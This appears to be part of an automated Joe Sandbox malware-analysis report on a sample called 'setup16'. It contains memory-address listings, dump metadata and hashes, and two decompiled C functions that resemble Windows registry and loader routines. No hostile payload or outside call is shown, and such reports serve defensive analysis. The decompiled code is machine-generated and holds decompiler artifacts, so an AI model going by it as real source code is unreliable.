                                                                                                                                                                                                        0x04a36e26
                                                                                                                                                                                                        0x04a36e2a
                                                                                                                                                                                                        0x049f51f9
                                                                                                                                                                                                        0x049f51f9
                                                                                                                                                                                                        0x049f51fe
                                                                                                                                                                                                        0x04a36e33
                                                                                                                                                                                                        0x04a36e33
                                                                                                                                                                                                        0x04a36e39
                                                                                                                                                                                                        0x04a36e3d
                                                                                                                                                                                                        0x04a36e46
                                                                                                                                                                                                        0x04a36e50
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36e52
                                                                                                                                                                                                        0x04a36e53
                                                                                                                                                                                                        0x04a36e56
                                                                                                                                                                                                        0x04a36e5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36e5f
                                                                                                                                                                                                        0x04a36e67
                                                                                                                                                                                                        0x04a36e77
                                                                                                                                                                                                        0x04a36e7f
                                                                                                                                                                                                        0x04a36e80
                                                                                                                                                                                                        0x04a36e88
                                                                                                                                                                                                        0x04a36e90
                                                                                                                                                                                                        0x04a36e9f
                                                                                                                                                                                                        0x04a36ea5
                                                                                                                                                                                                        0x04a36ea9
                                                                                                                                                                                                        0x04a36eb1
                                                                                                                                                                                                        0x04a36ebf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36ecf
                                                                                                                                                                                                        0x04a36ed3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36edb
                                                                                                                                                                                                        0x04a36ede
                                                                                                                                                                                                        0x04a36ee1
                                                                                                                                                                                                        0x04a36ee8
                                                                                                                                                                                                        0x04a36eeb
                                                                                                                                                                                                        0x04a36eed
                                                                                                                                                                                                        0x04a36ef0
                                                                                                                                                                                                        0x04a36ef4
                                                                                                                                                                                                        0x04a36ef8
                                                                                                                                                                                                        0x04a36efc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36f0d
                                                                                                                                                                                                        0x04a36f11
                                                                                                                                                                                                        0x04a36f32
                                                                                                                                                                                                        0x04a36f37
                                                                                                                                                                                                        0x04a36f3b
                                                                                                                                                                                                        0x04a36f3e
                                                                                                                                                                                                        0x04a36f41
                                                                                                                                                                                                        0x04a36f46
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36f4c
                                                                                                                                                                                                        0x04a36f50
                                                                                                                                                                                                        0x04a36f50
                                                                                                                                                                                                        0x04a36f54
                                                                                                                                                                                                        0x04a36f62
                                                                                                                                                                                                        0x04a36f65
                                                                                                                                                                                                        0x04a36f6d
                                                                                                                                                                                                        0x04a36f7b
                                                                                                                                                                                                        0x04a36f7b
                                                                                                                                                                                                        0x04a36f93
                                                                                                                                                                                                        0x04a36f98
                                                                                                                                                                                                        0x04a36fa0
                                                                                                                                                                                                        0x04a36fa6
                                                                                                                                                                                                        0x04a36fb3
                                                                                                                                                                                                        0x04a36fb6
                                                                                                                                                                                                        0x04a36fbf
                                                                                                                                                                                                        0x04a36fc1
                                                                                                                                                                                                        0x04a36fd5
                                                                                                                                                                                                        0x04a36fda
                                                                                                                                                                                                        0x04a36fda
                                                                                                                                                                                                        0x04a36fdd
                                                                                                                                                                                                        0x04a36fe2
                                                                                                                                                                                                        0x04a36fe7
                                                                                                                                                                                                        0x04a36feb
                                                                                                                                                                                                        0x04a36fef
                                                                                                                                                                                                        0x04a36ff3
                                                                                                                                                                                                        0x049f520c
                                                                                                                                                                                                        0x049f520c
                                                                                                                                                                                                        0x049f520f
                                                                                                                                                                                                        0x049f5215
                                                                                                                                                                                                        0x049f5234
                                                                                                                                                                                                        0x049f523a
                                                                                                                                                                                                        0x049f523a
                                                                                                                                                                                                        0x049f5244
                                                                                                                                                                                                        0x049f5245
                                                                                                                                                                                                        0x049f5246
                                                                                                                                                                                                        0x049f5251
                                                                                                                                                                                                        0x049f5251
                                                                                                                                                                                                        0x04a36f13
                                                                                                                                                                                                        0x04a36f17
                                                                                                                                                                                                        0x04a36f17
                                                                                                                                                                                                        0x04a36f18
                                                                                                                                                                                                        0x04a36f1b
                                                                                                                                                                                                        0x04a36f1f
                                                                                                                                                                                                        0x04a36f23
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a36f28
                                                                                                                                                                                                        0x049f5204
                                                                                                                                                                                                        0x049f5204
                                                                                                                                                                                                        0x049f5208
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f5208
                                                                                                                                                                                                        0x049f5185
                                                                                                                                                                                                        0x049f5188
                                                                                                                                                                                                        0x049f518a
                                                                                                                                                                                                        0x049f518e
                                                                                                                                                                                                        0x049f5195
                                                                                                                                                                                                        0x04a36db1
                                                                                                                                                                                                        0x04a36db5
                                                                                                                                                                                                        0x04a36db9
                                                                                                                                                                                                        0x049f519b
                                                                                                                                                                                                        0x049f519b
                                                                                                                                                                                                        0x049f519e
                                                                                                                                                                                                        0x049f51a7
                                                                                                                                                                                                        0x049f51a9
                                                                                                                                                                                                        0x049f51a9
                                                                                                                                                                                                        0x049f51b5
                                                                                                                                                                                                        0x049f51b8
                                                                                                                                                                                                        0x049f51bb
                                                                                                                                                                                                        0x049f51be
                                                                                                                                                                                                        0x049f51c1
                                                                                                                                                                                                        0x049f51c5
                                                                                                                                                                                                        0x049f51c9
                                                                                                                                                                                                        0x049f51cd
                                                                                                                                                                                                        0x049f51cd
                                                                                                                                                                                                        0x049f51d8
                                                                                                                                                                                                        0x049f51dc
                                                                                                                                                                                                        0x049f51e0
                                                                                                                                                                                                        0x04a36dcc
                                                                                                                                                                                                        0x04a36dd0
                                                                                                                                                                                                        0x04a36dd5
                                                                                                                                                                                                        0x04a36ddd
                                                                                                                                                                                                        0x04a36de1
                                                                                                                                                                                                        0x04a36de1
                                                                                                                                                                                                        0x04a36de5
                                                                                                                                                                                                        0x04a36deb
                                                                                                                                                                                                        0x04a36df1
                                                                                                                                                                                                        0x04a36df7
                                                                                                                                                                                                        0x04a36dfd
                                                                                                                                                                                                        0x04a36e01
                                                                                                                                                                                                        0x04a36e05
                                                                                                                                                                                                        0x04a36e09
                                                                                                                                                                                                        0x04a36e0d
                                                                                                                                                                                                        0x04a36e11
                                                                                                                                                                                                        0x04a36e11
                                                                                                                                                                                                        0x049f51eb
                                                                                                                                                                                                        0x04a36e1a
                                                                                                                                                                                                        0x04a36e1f
                                                                                                                                                                                                        0x04a36e21
                                                                                                                                                                                                        0x04a36e23
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f51f1
                                                                                                                                                                                                        0x049f51f1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f51f1

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 594fb8dc12d2239fcedacfad3a269c429c8fc06b8b6ce789005c84b30d38a3d8
                                                                                                                                                                                                        • Instruction ID: 5181cf6aff93611f89641012c59b7da25b3cfdd0dd579131c6f3b8856b3df459
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 594fb8dc12d2239fcedacfad3a269c429c8fc06b8b6ce789005c84b30d38a3d8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BC124756083809FD364CF28C580A5AFBF1BF88314F188A6EF9998B352D771E945CB42
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F03E2 Relevance: .3, Instructions: 254COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E049F03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4abd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E049F0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04A0B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E049DB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4ab7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E049E7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E049E7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04A47016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04A09830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04A469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4ab7c04 != 0) {
						_t118 = _v12;
						_t120 = E04A4A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4ab7bd8;
						if( *0x4ab7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04A095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04A099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04A43540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E049CB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04A0AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4ab8474 - 3;
										if( *0x4ab8474 != 3) {
											 *0x4ab79dc =  *0x4ab79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E049E7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E049E7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04A47016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4ab8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4ab7b00; // 0x0
							asm("ror esi, cl");
							 *0x4abb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04A095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E049D7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                                                                                                                        0x049f03f1
                                                                                                                                                                                                        0x049f03f7
                                                                                                                                                                                                        0x049f03f9
                                                                                                                                                                                                        0x049f03fb
                                                                                                                                                                                                        0x049f03fd
                                                                                                                                                                                                        0x049f0400
                                                                                                                                                                                                        0x049f040a
                                                                                                                                                                                                        0x04a34c7a
                                                                                                                                                                                                        0x049f0537
                                                                                                                                                                                                        0x049f0547
                                                                                                                                                                                                        0x049f0410
                                                                                                                                                                                                        0x049f0410
                                                                                                                                                                                                        0x049f0414
                                                                                                                                                                                                        0x049f0417
                                                                                                                                                                                                        0x049f041a
                                                                                                                                                                                                        0x049f0421
                                                                                                                                                                                                        0x049f0424
                                                                                                                                                                                                        0x049f042b
                                                                                                                                                                                                        0x049f043b
                                                                                                                                                                                                        0x049f043e
                                                                                                                                                                                                        0x049f043f
                                                                                                                                                                                                        0x049f043f
                                                                                                                                                                                                        0x049f0446
                                                                                                                                                                                                        0x049f0449
                                                                                                                                                                                                        0x049f044c
                                                                                                                                                                                                        0x049f044f
                                                                                                                                                                                                        0x049f0459
                                                                                                                                                                                                        0x04a34c8d
                                                                                                                                                                                                        0x049f045f
                                                                                                                                                                                                        0x049f045f
                                                                                                                                                                                                        0x049f045f
                                                                                                                                                                                                        0x049f0467
                                                                                                                                                                                                        0x04a34c97
                                                                                                                                                                                                        0x04a34c9d
                                                                                                                                                                                                        0x04a34ca4
                                                                                                                                                                                                        0x04a34caa
                                                                                                                                                                                                        0x04a34caf
                                                                                                                                                                                                        0x04a34cb1
                                                                                                                                                                                                        0x04a34cc3
                                                                                                                                                                                                        0x04a34cb3
                                                                                                                                                                                                        0x04a34cbc
                                                                                                                                                                                                        0x04a34cbc
                                                                                                                                                                                                        0x04a34cc8
                                                                                                                                                                                                        0x04a34ccb
                                                                                                                                                                                                        0x04a34cd7
                                                                                                                                                                                                        0x04a34cda
                                                                                                                                                                                                        0x04a34cdf
                                                                                                                                                                                                        0x04a34cdf
                                                                                                                                                                                                        0x04a34ccb
                                                                                                                                                                                                        0x04a34ca4
                                                                                                                                                                                                        0x049f046d
                                                                                                                                                                                                        0x049f046f
                                                                                                                                                                                                        0x049f046f
                                                                                                                                                                                                        0x049f0471
                                                                                                                                                                                                        0x049f0476
                                                                                                                                                                                                        0x049f047a
                                                                                                                                                                                                        0x049f047b
                                                                                                                                                                                                        0x049f0483
                                                                                                                                                                                                        0x049f0489
                                                                                                                                                                                                        0x049f048d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34ce9
                                                                                                                                                                                                        0x04a34cef
                                                                                                                                                                                                        0x04a34d22
                                                                                                                                                                                                        0x04a34d22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34d22
                                                                                                                                                                                                        0x04a34cf1
                                                                                                                                                                                                        0x04a34cf7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34cf9
                                                                                                                                                                                                        0x04a34cff
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34d05
                                                                                                                                                                                                        0x04a34d07
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34d0d
                                                                                                                                                                                                        0x04a34d0f
                                                                                                                                                                                                        0x04a34d14
                                                                                                                                                                                                        0x04a34d16
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34d1c
                                                                                                                                                                                                        0x04a34d1c
                                                                                                                                                                                                        0x049f0499
                                                                                                                                                                                                        0x049f0535
                                                                                                                                                                                                        0x049f0535
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f0535
                                                                                                                                                                                                        0x049f04a6
                                                                                                                                                                                                        0x04a34d2c
                                                                                                                                                                                                        0x04a34d37
                                                                                                                                                                                                        0x04a34d39
                                                                                                                                                                                                        0x04a34d3b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34d41
                                                                                                                                                                                                        0x04a34d48
                                                                                                                                                                                                        0x049f0527
                                                                                                                                                                                                        0x049f052b
                                                                                                                                                                                                        0x049f052d
                                                                                                                                                                                                        0x049f0530
                                                                                                                                                                                                        0x049f0530
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f052b
                                                                                                                                                                                                        0x04a34d4e
                                                                                                                                                                                                        0x049f04ac
                                                                                                                                                                                                        0x049f04ac
                                                                                                                                                                                                        0x049f04af
                                                                                                                                                                                                        0x049f04b2
                                                                                                                                                                                                        0x049f04b7
                                                                                                                                                                                                        0x049f04b9
                                                                                                                                                                                                        0x049f04bb
                                                                                                                                                                                                        0x049f04bd
                                                                                                                                                                                                        0x049f04bf
                                                                                                                                                                                                        0x049f04c5
                                                                                                                                                                                                        0x049f04c9
                                                                                                                                                                                                        0x04a34d53
                                                                                                                                                                                                        0x04a34d59
                                                                                                                                                                                                        0x04a34db9
                                                                                                                                                                                                        0x04a34dba
                                                                                                                                                                                                        0x04a34dbf
                                                                                                                                                                                                        0x04a34dc2
                                                                                                                                                                                                        0x04a34dc4
                                                                                                                                                                                                        0x04a34dc7
                                                                                                                                                                                                        0x04a34dce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34dce
                                                                                                                                                                                                        0x04a34d5b
                                                                                                                                                                                                        0x04a34d61
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34d63
                                                                                                                                                                                                        0x04a34d69
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34d6b
                                                                                                                                                                                                        0x04a34d6e
                                                                                                                                                                                                        0x04a34d74
                                                                                                                                                                                                        0x04a34d76
                                                                                                                                                                                                        0x04a34d7c
                                                                                                                                                                                                        0x04a34d7e
                                                                                                                                                                                                        0x04a34d84
                                                                                                                                                                                                        0x04a34d89
                                                                                                                                                                                                        0x04a34d8c
                                                                                                                                                                                                        0x04a34d8d
                                                                                                                                                                                                        0x04a34d92
                                                                                                                                                                                                        0x04a34d95
                                                                                                                                                                                                        0x04a34d96
                                                                                                                                                                                                        0x04a34d98
                                                                                                                                                                                                        0x04a34d9a
                                                                                                                                                                                                        0x04a34d9f
                                                                                                                                                                                                        0x04a34da4
                                                                                                                                                                                                        0x04a34da6
                                                                                                                                                                                                        0x04a34da8
                                                                                                                                                                                                        0x04a34daf
                                                                                                                                                                                                        0x04a34db1
                                                                                                                                                                                                        0x04a34db1
                                                                                                                                                                                                        0x04a34daf
                                                                                                                                                                                                        0x04a34da6
                                                                                                                                                                                                        0x04a34d84
                                                                                                                                                                                                        0x04a34d7c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34d74
                                                                                                                                                                                                        0x049f04d6
                                                                                                                                                                                                        0x04a34de1
                                                                                                                                                                                                        0x049f04dc
                                                                                                                                                                                                        0x049f04dc
                                                                                                                                                                                                        0x049f04dc
                                                                                                                                                                                                        0x049f04e4
                                                                                                                                                                                                        0x04a34deb
                                                                                                                                                                                                        0x04a34df1
                                                                                                                                                                                                        0x04a34df8
                                                                                                                                                                                                        0x04a34dfe
                                                                                                                                                                                                        0x04a34e03
                                                                                                                                                                                                        0x04a34e05
                                                                                                                                                                                                        0x04a34e17
                                                                                                                                                                                                        0x04a34e07
                                                                                                                                                                                                        0x04a34e10
                                                                                                                                                                                                        0x04a34e10
                                                                                                                                                                                                        0x04a34e1c
                                                                                                                                                                                                        0x04a34e1f
                                                                                                                                                                                                        0x04a34e35
                                                                                                                                                                                                        0x04a34e35
                                                                                                                                                                                                        0x04a34e1f
                                                                                                                                                                                                        0x04a34df8
                                                                                                                                                                                                        0x049f04f1
                                                                                                                                                                                                        0x049f04fa
                                                                                                                                                                                                        0x04a34e3f
                                                                                                                                                                                                        0x04a34e47
                                                                                                                                                                                                        0x04a34e5b
                                                                                                                                                                                                        0x04a34e61
                                                                                                                                                                                                        0x04a34e67
                                                                                                                                                                                                        0x04a34e69
                                                                                                                                                                                                        0x04a34e71
                                                                                                                                                                                                        0x04a34e73
                                                                                                                                                                                                        0x049f0500
                                                                                                                                                                                                        0x049f0500
                                                                                                                                                                                                        0x049f0500
                                                                                                                                                                                                        0x049f04fa
                                                                                                                                                                                                        0x049f0508
                                                                                                                                                                                                        0x049f051d
                                                                                                                                                                                                        0x049f051d
                                                                                                                                                                                                        0x049f051f
                                                                                                                                                                                                        0x049f0524
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f0524
                                                                                                                                                                                                        0x049f0515
                                                                                                                                                                                                        0x049f0517
                                                                                                                                                                                                        0x04a34e7a
                                                                                                                                                                                                        0x04a34e7c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34e85
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34e85
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f0517

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 00b0e603bb8e463a6a36fb4b52a24419bf9c944487ca85e6d01762e2c1c7971c
                                                                                                                                                                                                        • Instruction ID: 6dc024df6a243fa0cc605db763a825dd6be3096350d14ae73366421cbe63314f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00b0e603bb8e463a6a36fb4b52a24419bf9c944487ca85e6d01762e2c1c7971c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4910431E00218AFEB319B69CD44BAD7BA9EB45768F050275FA11AB2D2F774BC40C791
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CC600 Relevance: .2, Instructions: 225COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                                                        			E049CC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4abd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E049D6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04A0B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4ab7b9c; // 0x0
					_t74 = L049E4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04A09650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L049E77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04A0F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04A013C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
